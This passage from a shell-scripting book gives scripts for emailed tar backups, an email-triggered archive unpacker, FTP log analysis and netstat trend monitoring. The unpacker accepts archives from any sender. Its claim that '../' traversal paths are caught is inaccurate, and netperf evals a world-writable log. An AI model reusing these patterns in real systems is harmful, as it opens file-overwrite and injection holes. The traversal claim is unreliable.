#    consider using unpacker, Script #88, on the remote end too.

uuencode="/usr/bin/uuencode"
outfile="/tmp/rb.$$.tgz"
outfname="backup.$(date +%y%m%d).tgz"
infile="/tmp/rb.$$.in"

trap "/bin/rm -f $outfile $infile" 0

if [ $# -ne 2 -a $# -ne 3 ] ; then
  echo "Usage: $(basename $0) backup-file-list remoteaddr {targetdir}" >&2
  exit 1
fi

if [ ! -s "$1" ] ; then
  echo "Error: backup list $1 is empty or missing" >&2
  exit 1
fi

# Scan entries and build fixed infile list. This expands wildcards
# and escapes spaces in filenames with a backslash, producing a
# change: "this file" becomes this\ file so quotes are not needed.

while read entry; do
  echo "$entry" | sed -e 's/ /\\ /g' >> $infile
done < "$1"

# The actual work of building the archive, encoding it, and sending it

tar czf - $(cat $infile) | \
  $uuencode $outfname | \
  mail -s "${3:-Backup archive for $(date)}" "$2"

echo "Done. $(basename $0) backed up the following files:"
sed 's/^/   /' $infile
echo -n "and mailed them to $2 "

if [ ! -z "$3" ] ; then
  echo "with requested target directory $3"
else
  echo ""
fi

exit 0

How It Works
After the basic validity checks, the script processes the file containing the list of critical files, which is supplied as the
first command argument, to ensure that spaces embedded in its filenames will work in the while loop (remember, by
default spaces delimit arguments, so without some additional help, the shell will think that "test file" is two arguments,
not one). It does this by prefacing every space with a backslash. Then it builds the archive with the primitive but useful
tar command, which lacks the ability to read standard input for its file list and thus must be fed the filenames via a
cat invocation:

tar czf - $(cat $infile)

The tar invocation automatically compresses the archive, and uuencode is then utilized to ensure that the resultant
archive data file can be successfully emailed without corruption. The end result is that the remote address receives an
email message with the uuencoded tar archive as an attachment. This should be a straightforward script.

Note  The uuencode program wraps up binary data so that it can safely travel through the email system without
      being corrupted. See man uuencode for more information.
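The escaping step can be tried on its own; note that each space becomes backslash-space:

```shell
#!/bin/sh
# Preface every space in a filename with a backslash, as the while
# loop above does for each line of the backup list.
echo "my test file.txt" | sed -e 's/ /\\ /g'    # my\ test\ file.txt
```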

Running the Script


This script expects two arguments: the name of a file that contains a list of files to archive and back up, and the
destination email address for the compressed, uuencoded archive file. The file list can be as simple as
$ cat filelist
*.sh
*.html

The Results
$ remotebackup filelist taylor@intuitive.com
Done. remotebackup backed up the following files:
   *.sh
   *.html
and mailed them to taylor@intuitive.com

A more sophisticated use of this script lets us tie it in to the system mirroring tool presented as Script #88, Mirroring a
Website, with the third argument specifying a target unpacking directory:

$ cd /web
$ remotebackup backuplist taylor@intuitive.com mirror
Done. remotebackup backed up the following files:
   ourecopass
and mailed them to taylor@intuitive.com with requested target
directory mirror

Hacking the Script


First off, if you have a modern version of tar, you might find that it has the ability to read a list of files from stdin,
in which case this script can be shortened even further by updating how the file list is given to tar (for example,
GNU's tar has a -T flag to have the file list read from standard input).
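With GNU tar, the while loop and cat expansion could both go away, since each input line is then taken as one complete filename (so embedded spaces need no escaping). A sketch, with invented demo files:

```shell
#!/bin/sh
# Build the archive by piping the file list straight into GNU tar -T -.
mkdir -p demo
echo "hello" > "demo/test file.txt"
printf '%s\n' "demo/test file.txt" | tar czf archive.tgz -T -
tar tzf archive.tgz      # lists: demo/test file.txt
rm -rf demo archive.tgz
```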
The file archive can then be unpacked (as explored in Script #88, Mirroring a Website) or simply saved, with a mailbox
trimmer script run weekly to ensure that the mailbox doesn't get too big. Here's a sample trimmer script:
#!/bin/sh

# trimmailbox - A simple script to ensure that only the four most recent
#    messages remain in the user's mailbox. Works with Berkeley Mail
#    (aka Mailx or mail): will need modifications for other mailers!!

keep=4      # by default, let's just keep around the four most recent messages

totalmsgs="$(echo 'x' | mail | sed -n '2p' | awk '{print $2}')"

if [ $totalmsgs -lt $keep ] ; then
  exit 0      # nothing to do
fi

topmsg="$(( $totalmsgs - $keep ))"

mail > /dev/null << EOF
d1-$topmsg
q
EOF

exit 0
This succinct script deletes all messages in the mailbox other than the $keep most recent ones. Obviously, if you're
using something like Hotmail or Yahoo! Mail for your archive storage spot, this script won't work and you'll have to log
in occasionally to trim things.

#88 Mirroring a Website


Large, busy websites like Yahoo! operate a number of mirrors, separate servers that are functionally identical to the
main site but are running on different hardware. While it's unlikely that you can duplicate all of their fancy setup, the
basic mirroring of a website isn't too difficult with a shell script or two.
The first step is to automatically pack up, compress, and transfer a snapshot of the master website to the mirror server.
This is easily done with the remotebackup script shown in Script #87, invoked nightly by cron.
Instead of sending the archive to your own mail address, however, send it to a special address named unpacker,
then add a sendmail alias in /etc/aliases (or the equivalent in other mail transport agents) that points to the
unpacker script given here, which then unpacks and installs the archive:

unpacker: "|/home/taylor/bin/archive-unpacker"

You'll want to ensure that the script is executable and be sensitive to which applications are in the default PATH used
by sendmail: The /var/log/messages log should reveal whether there are any problems invoking the script
as you debug it.

The Code
#!/bin/sh

# unpacker - Given an input stream with a uuencoded archive from
#    the remote archive script, unpacks and installs the archive.

temp="/tmp/$(basename $0).$$"
home="${HOME:-/usr/home/taylor}"
mydir="$home/archive"
webhome="/usr/home/taylor/web"
notify="taylor@intuitive.com"

( cat - > $temp      # shortcut to save stdin to a file

  target="$(grep "^Subject: " $temp | cut -d' ' -f2-)"

  echo $(basename $0): Saved as $temp, with $(wc -l < $temp) lines
  echo "message subject=\"$target\""

  # Move into the temporary unpacking directory...

  if [ ! -d $mydir ] ; then
    echo "Warning: archive dir $mydir not found. Unpacking into $home"
    cd $home
    mydir=$home      # for later use
  else
    cd $mydir
  fi

  # Extract the resultant filename from the uuencoded file...

  fname="$(awk '/^begin / {print $3}' $temp)"

  uudecode $temp

  if [ ! -z "$(echo $target | grep 'Backup archive for')" ] ; then
    # All done. No further unpacking needed.
    echo "Saved archive as $mydir/$fname"
    exit 0
  fi

  # Otherwise, we have a uudecoded file and a target directory

  if [ "$(echo $target|cut -c1)" = "/" -o "$(echo $target|cut -c1-2)" = ".." ]
  then
    echo "Invalid target directory $target. Can't use '/' or '..'"
    exit 0
  fi

  targetdir="$webhome/$target"

  if [ ! -d $targetdir ] ; then
    echo "Invalid target directory $target. Can't find in $webhome"
    exit 0
  fi

  gunzip $fname
  fname="$(echo $fname | sed 's/.tgz$/.tar/g')"

  # Are the tar archive filenames in a valid format?

  if [ ! -z "$(tar tf $fname | grep '^/')" ] ; then
    echo "Can't unpack archive: filenames are absolute."
    exit 0
  fi

  echo ""
  echo "Unpacking archive $fname into $targetdir"

  cd $targetdir
  tar xvf $mydir/$fname | sed 's/^/  /g'

  echo "done!"

) 2>&1 | mail -s "Unpacker output $(date)" $notify

exit 0

How It Works
The first thing to notice about this script is that it is set up to mail its results to the address specified in the notify
variable. While you may opt to disable this feature, it's quite helpful to get a confirmation of the receipt and successful
unpacking of the archive from the remote server. To disable the email feature, simply remove the wrapping parentheses
(from the initial cat to the end of the script), the entire last line in which the output is fed into the mail program, and
the echo invocations throughout the script that output its status.
This script can be used to unpack two types of input: If the subject of the email message is a valid subdirectory of the
webhome directory, the archive will be unpacked into that destination. If the subject is anything else, the uudecoded,
but still compressed (with gzip), archive will be stored in the mydir directory.
One challenge with this script is that the file to work with keeps changing names as the script progresses and
unwraps/unpacks the archive data. Initially, the email input stream is saved in $temp, but when this input is run
through uudecode, the extracted file has the same name as it had before the uuencode program was run in
Avoiding Disaster with a Remote Archive, Script #87. This new filename is extracted as fname in this script:

fname="$(awk '/^begin / {print $3}' $temp)"

Because the tar archive is compressed, $fname is something.tgz. If a valid subdirectory of the main web
directory is specified in the subject line of the email, and thus the archive is to be installed, the value of $fname is
modified yet again during the process to have a .tar suffix:

fname="$(echo $fname | sed 's/.tgz$/.tar/g')"

As a security precaution, unpacker won't actually unpack a tar archive that contains filenames with absolute paths
(a worst case could be /etc/passwd: you really don't want that overwritten because of an email message
received!), so care must be taken when building the archive on the local system to ensure that all filenames are
relative, not absolute. Note that tricks like ../../../../etc/passwd will be caught by the script test too.
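The absolute-path test can be exercised by hand. This sketch builds a tiny archive with relative member names (invented for the demonstration) and shows the check passing; tar tf prints one member name per line, so grep '^/' would find any absolute paths:

```shell
#!/bin/sh
# Refuse any archive whose member names begin with /.
mkdir -p safe
echo ok > safe/file.txt
tar cf safe.tar safe/file.txt
if [ ! -z "$(tar tf safe.tar | grep '^/')" ] ; then
  echo "absolute paths found: refusing to unpack"
else
  echo "all member names are relative"
fi
rm -rf safe safe.tar
```

(Modern tar implementations also strip leading slashes on extraction by default, but an explicit check costs nothing.)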

Running the Script


Because this script is intended to be run from within the lowest levels of the email system, it has no parameters and no
output: All output is sent via email to the address specified as notify.

The Results

The results of this script aren't visible on the command line, but we can look at the email produced when an archive is
sent without a target directory specified:
archive-unpacker: Saved as /tmp/unpacker.38198, with 1081 lines
message subject="Backup archive for Wed Sep 17 22:48:11 GMT 2003"
Saved archive as /home/taylor/archive/backup.030918.tgz

When a target directory is specified but is not available for writing, the following error is sent via email:

archive-unpacker: Saved as /tmp/unpacker.48894, with 1081 lines
message subject="mirror"
Invalid target directory mirror. Can't find in /web

And finally, here is the message sent when everything is configured properly and the archive has been received and
unpacked:

archive-unpacker: Saved as /tmp/unpacker.49189, with 1081 lines
message subject="mirror"

Unpacking archive backup.030918.tar into /web/mirror
  ourecopass/
  ourecopass/index.html
  ourecopass/nq-map.gif
  ourecopass/nq-map.jpg
  ourecopass/contact.html
  ourecopass/mailform.cgi
  ourecopass/cgi-lib.pl
  ourecopass/lists.html
  ourecopass/joinlist.cgi
  ourecopass/thanks.html
  ourecopass/thanks-join.html
done!
Sure enough, if we peek in the /web/mirror directory, everything is created as we hoped:

$ ls -Rs /web/mirror
total 1
1 ourecopass/

/web/mirror/ourecopass:
total 62
 4 cgi-lib.pl        2 lists.html
 2 contact.html      2 mailform.cgi*
 2 index.html       20 nq-map.gif
 2 joinlist.cgi*    26 nq-map.jpg
 2 thanks-join.html
 1 thanks.html

#89 Tracking FTP Usage


If you're running an anonymous FTP server, you should already be constantly monitoring what happens in the
~ftp/pub directory (which is usually where uploads are allowed), but any FTP server requires you to keep an eye
on things.
The ftp daemon's transfer log (xferlog) file format is definitely one of the most cryptic in Unix, which makes
analyzing it in a script rather tricky. Worse, there are two formats in circulation: a standard, common xferlog
format that just about everyone uses (and which this script expects), and an abbreviated ftpd.log format that
some BSD versions of ftpd use that's just about impossible to analyze in a script.
So we'll focus on the xferlog format. The columns in an xferlog are as shown in Table 10-2.
Table 10-2: Field values in the xferlog file

Column   Value
1-5      Current time
6        Transfer time (secs)
7        Remote host
8        File size
9        Filename
10       Transfer type
11       Special action flag
12       Direction
13       Access mode
14       Username
15       Service name
16       Authentication method
17       Authenticated user ID
18-?     Additional codes as added by the specific ftpd program (usually omitted)

A sample line from an xferlog is as cryptic as you might expect:

Mon Nov  4 12:22:46 2002 2 192.168.124.152 2170570 \
/home/ftp/pub/openssl-0.9.5r.tar.gz b _ i r leo ftp 0 * c
This script quickly scans through xferlog, highlighting connections and files uploaded and downloaded, and
producing other useful statistics.
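Given the field layout in Table 10-2, awk can pull the interesting values out of such a line directly; this is exactly the kind of extraction the script below performs:

```shell
#!/bin/sh
# Fields per Table 10-2: $9 = filename, $12 = direction (i/o),
# $13 = access mode, $14 = username. Sample line from the text above.
line='Mon Nov 4 12:22:46 2002 2 192.168.124.152 2170570 /home/ftp/pub/openssl-0.9.5r.tar.gz b _ i r leo ftp 0 * c'
echo "$line" | \
  awk '{print "file:", $9; print "direction:", $12; print "user:", $14}'
```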

The Code
#!/bin/sh

# xferlog - Analyzes and summarizes the FTP transfer log. A good doc
#   detailing the log format is http://aolserver.am.net/docs/2.3/ftp-ch4.htm.

stdxferlog="/var/log/xferlog"
temp="/tmp/$(basename $0).$$"
nicenum="$HOME/bin/nicenumber"      # Script #4

trap "/bin/rm -f $temp" 0

extract()
{
  # Called with $1 = desired access mode, $2 = section name for output

  if [ ! -z "$(echo $accessmode | grep $1)" ] ; then
    echo "" ; echo "$2"
    if [ "$1" = "a" -o "$1" = "g" ] ; then
      echo "  common account (entered password) values:"
    else
      echo "  user accounts accessing server:"
    fi
    awk "\$13 == \"$1\" { print \$14 }" $log | sort | \
      uniq -c | sort -rn | head -10 | sed 's/^/     /'
    awk "\$13 == \"$1\" && \$12 == \"o\" { print \$9 }" $log | sort | \
      uniq -c | sort -rn | head -10 | sed 's/^/     /' > $temp
    if [ -s $temp ] ; then
      echo "  files downloaded from server:" ; cat $temp
    fi
    awk "\$13 == \"$1\" && \$12 == \"i\" { print \$9 }" $log | sort | \
      uniq -c | sort -rn | head -10 | sed 's/^/     /' > $temp
    if [ -s $temp ] ; then
      echo "  files uploaded to server:" ; cat $temp
    fi
  fi
}
###### The main script block

case $# in
  0 ) log=$stdxferlog     ;;
  1 ) log="$1"            ;;
  * ) echo "Usage: $(basename $0) {xferlog name}" >&2
      exit 1
esac

if [ ! -r $log ] ; then
  echo "$(basename $0): can't read $log." >&2
  exit 1
fi

# Ascertain whether it's an abbreviated or standard ftp log file format. If
# it's the abbreviated format, output some minimal statistical data and quit:
# The abbreviated format is too difficult to analyze in a short script,
# unfortunately.

if [ ! -z "$(awk '$6 == "get" { short=1 } END{ print short }' $log)" ] ; then
  bytesin="$(awk 'BEGIN{sum=0} $6 == "get" { sum += $9 } END{ print sum }' $log)"
  bytesout="$(awk 'BEGIN{sum=0} $6 == "put" { sum += $9 } END{ print sum }' $log)"

  echo -n "Abbreviated ftpd xferlog from "
  echo -n $(head -1 $log | awk '{ print $1, $2, $3 }')
  echo " to $(tail -1 $log | awk '{ print $1, $2, $3 }')"
  echo "  bytes in: $($nicenum $bytesin)"
  echo "  bytes out: $($nicenum $bytesout)"
  exit 0
fi

bytesin="$(awk 'BEGIN{sum=0} $12 == "i" { sum += $8 } END{ print sum }' $log)"
bytesout="$(awk 'BEGIN{sum=0} $12 == "o" { sum += $8 } END{ print sum }' $log)"
time="$(awk 'BEGIN{sum=0} { sum += $6 } END{ print sum }' $log)"

echo -n "Summary of xferlog from "
echo -n $(head -1 $log | awk '{ print $1, $2, $3, $4, $5 }')
echo " to $(tail -1 $log | awk '{ print $1, $2, $3, $4, $5 }')"
echo "  bytes in: $($nicenum $bytesin)"
echo "  bytes out: $($nicenum $bytesout)"
echo "  transfer time: $time seconds"

accessmode="$(awk '{ print $13 }' $log | sort -u)"

extract "a" "Anonymous Access"
extract "g" "Guest Account Access"
extract "r" "Real User Account Access"

exit 0

How It Works
In an xferlog, the total number of incoming bytes can be calculated by extracting just those lines that have
direction="i" and then summing up the eighth column of data. Outgoing bytes are in the same column, but for
direction="o".

bytesin="$(awk 'BEGIN{sum=0} $12 == "i" { sum += $8 } END{ print sum }' $log)"
bytesout="$(awk 'BEGIN{sum=0} $12 == "o" { sum += $8 } END{ print sum }' $log)"
Ironically, the slower the network connection, the more accurate the total connection time is. On a fast network, smaller
transfers are logged as taking zero seconds, though clearly every transfer that succeeds must be longer than that.
Three types of access mode are possible: a is anonymous, g is for users who utilize the guest account (usually
password protected), and r is for real or regular users. In the case of anonymous and guest users, the account value
(field 14) is the user's password. People connecting anonymously are requested by their FTP program to specify their
email address as their password, which is then logged and can be analyzed.
Of this entire xferlog output stream, the most important entries are those with an anonymous access mode and a
direction of i, indicating that the entry is an upload listing. If you have allowed anonymous connections and have either
deliberately or accidentally left a directory writable, these anonymous upload entries are where you'll be able to see whether
script kiddies, warez hackers, and other characters of ill repute are exploiting your system. If such an entry lists a file
uploaded to your server, it needs to be checked out immediately, even if the filename seems quite innocuous.
This test occurs in the following statement in the extract function:

awk "\$13 == \"$1\" && \$12 == \"i\" { print \$9 }" $log | sort | \
  uniq -c | sort -rn | head -10 | sed 's/^/     /' > $temp
In this rather complex awk invocation, we're checking to see whether field 13 matches the anonymous account code
(because extract is called as extract "a" "Anonymous Access") and whether field 12 indicates that it's
an upload with the code i. If both of these conditions are true, we process the value of field 9, which is the name of
the file uploaded.
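As a quick sanity check, the same field tests can be run against a fabricated two-line log (both entries and the paths in them are made up for illustration; the field layout follows Table 10-2):

```shell
# Two hypothetical xferlog entries: one anonymous download (direction o),
# one anonymous upload (direction i)
cat > /tmp/demo.xferlog << 'EOF'
Mon Nov 4 12:22:46 2002 2 192.168.124.152 2170570 /pub/openssl.tar.gz b _ o a mom@example.com ftp 0 * c
Mon Nov 4 12:29:03 2002 1 192.168.124.152 80 /tmp/Find.Warez.txt b _ i a warez@example.com ftp 0 * c
EOF

# Field 13 = access mode ("a" = anonymous), field 12 = direction ("i" = upload):
awk '$13 == "a" && $12 == "i" { print $9 }' /tmp/demo.xferlog

rm -f /tmp/demo.xferlog
```

Only the uploaded file's name is printed, which is exactly the case the script flags for immediate review.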
If you're running an FTP server, this is definitely a script for a weekly (or even daily) cron job.

Running the Script


If invoked without any arguments, this script tries to read and analyze the standard ftpd transfer log
/var/log/xferlog. If that's not the correct log file, a different filename can be specified on the command line.

The Results
The results depend on the format of the transfer log the script is given. If it's an abbreviated form, some minimal
statistics are generated and the script quits:
$ xferlog succinct.xferlog
Abbreviated ftpd xferlog from Aug 1 04:20:11 to Sep 1 04:07:41
  bytes in: 215,300,253
  bytes out: 30,305,090
When a full xferlog in standard format is encountered, considerably more information can be obtained and
displayed by the script:
$ xferlog
Summary of xferlog from Mon Sep 1 5:03:11 2003 to Tue Sep 30 17:38:50 2003
  bytes in: 675,840
  bytes out: 3,989,488
  transfer time: 11 seconds

Anonymous Access
  common account (entered password) values:
     1 taylor@intuitive.com
     1 john@doe
  files downloaded from server:
     1 /MySubscriptions.opml
  files uploaded to server:
     1 /tmp/Find.Warez.txt

Real User Account Access
  user accounts accessing server:
     7 rufus
     2 taylor
  files downloaded from server:
     7 /pub/AllFiles.tgz
     2 /pub/AllFiles.tar
Security Alert! Did you notice that someone using anonymous FTP has uploaded a file called
/tmp/Find.Warez.txt? "Warez" are illegal copies of licensed software, not something you want on your
server. Upon seeing this, I immediately went into my FTP archive and deleted the file.

#90 Monitoring Network Status


One of the most puzzling administrative utilities in Unix is netstat, which is too bad, because it offers quite a bit of
useful information about network throughput and performance. With the -s flag, netstat outputs volumes of
information about each of the protocols supported on your computer, including TCP, UDP, IPv6, ICMP, IPsec, and
more. Most of those protocols are irrelevant for a typical configuration; the protocol to examine is TCP. This script
analyzes TCP protocol traffic, determining the percentage of failure and including a warning if any values are out of
bounds.
Analyzing network performance as a snapshot of long-term performance is useful, but a much better way to analyze
data is with trends. If your system regularly has 1.5 percent packet loss in transmission, and in the last three days the
rate has jumped up to 7.8 percent, a problem is brewing and needs to be analyzed in more detail.
As a result, Script #90 is in two parts. The first part is a short script that is intended to run every 10 to 30 minutes,
recording key statistics in a log file. The second script parses the log file and reports typical performance and any
anomalies or other values that are increasing over time.
Caution Some flavors of Unix can't run this code as is! It turns out that there is quite a bit of variation in the output
format of the netstat command between Linux and Unix versions. This code works for Mac OS X and
FreeBSD; the changes for other Unixes should be straightforward (check the log file to see if you're
getting meaningful results to ascertain whether you need to tweak it).

The Code
#!/bin/sh

# getstats - Every 'n' minutes, grabs netstat values (via crontab).

logfile="/var/log/netstat.log"
temp="/tmp/getstats.tmp"

trap "/bin/rm -f $temp" 0

( echo -n "time=$(date +%s);"

  netstat -s -p tcp > $temp

  sent="$(grep 'packets sent' $temp | cut -d\  -f1 | sed 's/[^[:digit:]]//g')"
  resent="$(grep 'retransmitted' $temp | cut -d\  -f1 | sed 's/[^[:digit:]]//g')"
  received="$(grep 'packets received$' $temp | cut -d\  -f1 | \
    sed 's/[^[:digit:]]//g')"
  dupacks="$(grep 'duplicate acks' $temp | cut -d\  -f1 | \
    sed 's/[^[:digit:]]//g')"
  outoforder="$(grep 'out-of-order packets' $temp | cut -d\  -f1 | \
    sed 's/[^[:digit:]]//g')"
  connectreq="$(grep 'connection requests' $temp | cut -d\  -f1 | \
    sed 's/[^[:digit:]]//g')"
  connectacc="$(grep 'connection accepts' $temp | cut -d\  -f1 | \
    sed 's/[^[:digit:]]//g')"
  retmout="$(grep 'retransmit timeouts' $temp | cut -d\  -f1 | \
    sed 's/[^[:digit:]]//g')"

  echo -n "snt=$sent;re=$resent;rec=$received;dup=$dupacks;"
  echo -n "oo=$outoforder;creq=$connectreq;cacc=$connectacc;"
  echo "reto=$retmout"
) >> $logfile

exit 0
The second script analyzes the netstat historical log file:
#!/bin/sh

# netperf - Analyzes the netstat running performance log, identifying
#   important results and trends.

log="/var/log/netstat.log"
scriptbc="$HOME/bin/scriptbc"      # Script #9
stats="/tmp/netperf.stats.$$"
awktmp="/tmp/netperf.awk.$$"

trap "/bin/rm -f $awktmp $stats" 0

if [ ! -r $log ] ; then
  echo "Error: can't read netstat log file $log" >&2
  exit 1
fi

# First, report the basic statistics of the latest entry in the log file...

eval $(tail -1 $log)    # all values turn into shell variables

rep="$($scriptbc -p 3 $re/$snt\*100)"
repn="$($scriptbc -p 4 $re/$snt\*10000 | cut -d. -f1)"
repn="$(( $repn / 100 ))"
retop="$($scriptbc -p 3 $reto/$snt\*100)"
retopn="$($scriptbc -p 4 $reto/$snt\*10000 | cut -d. -f1)"
retopn="$(( $retopn / 100 ))"
dupp="$($scriptbc -p 3 $dup/$rec\*100)"
duppn="$($scriptbc -p 4 $dup/$rec\*10000 | cut -d. -f1)"
duppn="$(( $duppn / 100 ))"
oop="$($scriptbc -p 3 $oo/$rec\*100)"
oopn="$($scriptbc -p 4 $oo/$rec\*10000 | cut -d. -f1)"
oopn="$(( $oopn / 100 ))"

echo "Netstat is currently reporting the following:"
echo -n "  $snt packets sent, with $re retransmits ($rep%) "
echo "and $reto retransmit timeouts ($retop%)"
echo -n "  $rec packets received, with $dup dupes ($dupp%)"
echo " and $oo out of order ($oop%)"
echo "  $creq total connection requests, of which $cacc were accepted"
echo ""

## Now let's see if there are any important problems to flag

if [ $repn -ge 5 ] ; then
  echo "*** Warning: Retransmits of >= 5% indicates a problem"
  echo "(gateway or router flooded?)"
fi
if [ $retopn -ge 5 ] ; then
  echo "*** Warning: Transmit timeouts of >= 5% indicates a problem"
  echo "(gateway or router flooded?)"
fi
if [ $duppn -ge 5 ] ; then
  echo "*** Warning: Duplicate receives of >= 5% indicates a problem"
  echo "(probably on the other end)"
fi
if [ $oopn -ge 5 ] ; then
  echo "*** Warning: Out of orders of >= 5% indicates a problem"
  echo "(busy network or router/gateway flood)"
fi

# Now let's look at some historical trends...

echo "analyzing trends...."

while read logline ; do
  eval "$logline"
  rep2="$($scriptbc -p 4 $re / $snt \* 10000 | cut -d. -f1)"
  retop2="$($scriptbc -p 4 $reto / $snt \* 10000 | cut -d. -f1)"
  dupp2="$($scriptbc -p 4 $dup / $rec \* 10000 | cut -d. -f1)"
  oop2="$($scriptbc -p 4 $oo / $rec \* 10000 | cut -d. -f1)"
  echo "$rep2 $retop2 $dupp2 $oop2" >> $stats
done < $log

echo ""

# Now calculate some statistics, and compare them to the current values

cat << "EOF" > $awktmp
    { rep += $1; retop += $2; dupp += $3; oop += $4 }
END { rep /= 100; retop /= 100; dupp /= 100; oop /= 100;
      print "reps=" int(rep/NR) ";retops=" int(retop/NR) \
            ";dupps=" int(dupp/NR) ";oops=" int(oop/NR) }
EOF

eval $(awk -f $awktmp < $stats)

if [ $repn -gt $reps ] ; then
  echo "*** Warning: Retransmit rate is currently higher than average."
  echo "    (average is $reps% and current is $repn%)"
fi
if [ $retopn -gt $retops ] ; then
  echo "*** Warning: Transmit timeouts are currently higher than average."
  echo "    (average is $retops% and current is $retopn%)"
fi
if [ $duppn -gt $dupps ] ; then
  echo "*** Warning: Duplicate receives are currently higher than average."
  echo "    (average is $dupps% and current is $duppn%)"
fi
if [ $oopn -gt $oops ] ; then
  echo "*** Warning: Out of orders are currently higher than average."
  echo "    (average is $oops% and current is $oopn%)"
fi

echo \(analyzed $(wc -l < $stats) netstat log entries for calculations\)

exit 0

How It Works
The netstat program is tremendously useful, but its output can be quite intimidating. Here are just the first ten lines:

$ netstat -s -p tcp | head
tcp:
    36083 packets sent
        9134 data packets (1095816 bytes)
        24 data packets (5640 bytes) retransmitted
        0 resends initiated by MTU discovery
        19290 ack-only packets (13856 delayed)
        0 URG only packets
        0 window probe packets
        6295 window update packets
        1340 control packets
So the first step is to extract just those entries that contain interesting and important network performance statistics.
That's the main job of getstats, and it does this by saving the output of the netstat command into the temp file
$temp and going through $temp ascertaining key values, such as total packets sent and received. To ascertain the
number of packets sent, for example, the script uses

sent="$(grep 'packets sent' $temp | cut -d\  -f1 | sed 's/[^[:digit:]]//g')"

The sed invocation removes any nondigit values to ensure that no spaces or tabs end up as part of the resultant
value. Then all of the extracted values are written to the netstat.log log file in the format
var1Name=var1Value; var2Name=var2Value; and so forth. This format will let us later use eval on
each line in netstat.log and have all the variables instantiated in the shell:

time=1063984800;snt=3872;re=24;rec=5065;dup=306;oo=215;creq=46;cacc=17;reto=170
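Both steps can be sketched in isolation, using a hypothetical netstat output line and a shortened log entry:

```shell
# Strip everything but digits, the same cleanup getstats applies
sample='        36083 packets sent'
sent="$(echo "$sample" | sed 's/[^[:digit:]]//g')"
echo "sent=$sent"

# A log line in var=value; format becomes shell variables via eval
logline='snt=3872;re=24'
eval "$logline"
echo "snt is $snt with $re retransmits"
```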
The netperf script does the heavy lifting, parsing netstat.log and reporting both the most recent performance
numbers and any anomalies or other values that are increasing over time.
Although the netperf script seems complex, once you understand the math, it's quite straightforward. For example, it
calculates the current percentage of retransmits by dividing retransmits by packets sent and then multiplying this result
by 100. An integer-only version of the retransmission percentage is calculated by taking the result of dividing
retransmissions by total packets sent, multiplying it by 10,000, and then dividing by 100:

rep="$($scriptbc -p 3 $re/$snt\*100)"
repn="$($scriptbc -p 4 $re/$snt\*10000 | cut -d. -f1)"
repn="$(( $repn / 100 ))"
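Since scriptbc (Script #9) is essentially a wrapper around bc, the same arithmetic can be sketched with bc directly; the retransmit and packet counts here (24 of 25108) are the ones that appear in the sample run later in this section:

```shell
re=24 ; snt=25108

# four decimal places of precision, scaled up by 10,000...
repn="$(echo "scale=4; $re / $snt * 10000" | bc | cut -d. -f1)"

# ...then divided by 100 gives an integer-only percentage
repn="$(( repn / 100 ))"
echo "retransmit rate: ${repn}%"
```

With these values the integer percentage comes out to 0, matching the "(0%)" shown in the netperf output.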

As you can see, the naming scheme for variables within the script begins with the abbreviations assigned to the various
netstat values, which are stored in netstat.log at the end of the getstats script:

echo -n "snt=$sent;re=$resent;rec=$received;dup=$dupacks;"
echo -n "oo=$outoforder;creq=$connectreq;cacc=$connectacc;"
echo "reto=$retmout"

The abbreviations are snt, re, rec, dup, oo, creq, cacc, and reto. In the netperf script, the p suffix is
added to any of these abbreviations for variables that represent decimal percentages of total packets sent or received.
The pn suffix is added to any of the abbreviations for variables that represent integer-only percentages of total packets
sent or received. Later in the netperf script, the ps suffix denotes a variable that represents the percentage
summaries (averages) used in the final calculations.
The while loop steps through each entry of netstat.log, calculating the four key percentile variables (re,
reto, dup, and oo, which are retransmits, transmit timeouts, duplicates, and out of order, respectively). All are
written to the $stats temp file, and then the awk script sums each column in $stats and calculates average
column values by dividing the sums by the number of records in the file (NR).
The following line in the script ties things together:

eval $(awk -f $awktmp < $stats)

The awk invocation is fed the set of summary statistics ($stats) produced by the while loop and utilizes the
calculations saved in the $awktmp file to output variable=value sequences. These variable=value
sequences are then incorporated into the shell with the eval statement, instantiating the variables reps, retops,
dupps, and oops, which are average retransmits, average retransmit timeouts, average duplicate packets, and
average out-of-order packets, respectively. The current percentile values can then be compared to these average
values to spot problematic trends.
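The column-summing step can be sketched in isolation with a couple of fabricated rows (the numbers are made up for illustration; real rows come from the while loop):

```shell
# Columns: retransmits, timeouts, dupes, out-of-order, each scaled by 100
printf '%s\n' "9 600 440 340" "9 600 420 300" > /tmp/demo.stats

# Sum each column, divide by 100 to undo the scaling, then average over NR rows
awk '    { rep += $1; retop += $2; dupp += $3; oop += $4 }
     END { rep /= 100; retop /= 100; dupp /= 100; oop /= 100;
           print "reps=" int(rep/NR) ";dupps=" int(dupp/NR) }' /tmp/demo.stats

rm -f /tmp/demo.stats
```

The printed var=value string is exactly what the eval in the script turns back into shell variables.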

Running the Script


For the netperf script to work, it needs information in the netstat.log file. That information is generated by
having a crontab entry that invokes getstats with some level of frequency. On a modern Mac OS X, Unix, or
Linux system, the following crontab entry will work fine:

*/15 * * * * /home/taylor/bin/getstats

It will produce a log file entry every 15 minutes. To ensure the necessary file permissions, it's best to actually create an
empty log file by hand before running getstats for the first time:

$ sudo touch /var/log/netstat.log
$ sudo chmod a+rw /var/log/netstat.log

Now the getstats program should chug along happily, building a historical picture of the network performance of
your system. To actually analyze the contents of the log file, run netperf without any arguments.

The Results
First off, let's check on the netstat.log file:

$ tail -3 /var/log/netstat.log
time=1063981801;snt=14386;re=24;rec=15700;dup=444;oo=555;creq=563;cacc=17;reto=158
time=1063982400;snt=17236;re=24;rec=20008;dup=454;oo=848;creq=570;cacc=17;reto=158
time=1063983000;snt=20364;re=24;rec=25022;dup=589;oo=1181;creq=582;cacc=17;reto=158

It looks good, so let's run netperf and see what it has to report:

$ netperf
Netstat is currently reporting the following:
  25108 packets sent, with 24 retransmits (0%) and 158 retransmit timeouts (.600%)
  34423 packets received, with 1529 dupes (4.400%) and 1181 out of order (3.400%)
  583 total connection requests, of which 17 were accepted

analyzing trends....

*** Warning: Duplicate receives are currently higher than average.
    (average is 3% and current is 4%)
*** Warning: Out of orders are currently higher than average.
    (average is 0% and current is 3%)
(analyzed 48 netstat log entries for calculations)

Hacking the Script

You've likely already noticed that rather than using a human-readable date format, the getstats script saves entries
in the netstat.log file using epoch time, which represents the number of seconds that have elapsed since January
1, 1970. For example, 1,063,983,000 seconds represents a day in late September 2003.
The use of epoch time will make it easier to enhance this script by enabling it to calculate the time lapse between
readings. If, for some odd reason, your system's date command doesn't have the %s option for reporting epoch time,
there's a short C program you can install to report the epoch time on just about any system:

http://www.intuitive.com/wicked/examples/epoch.c
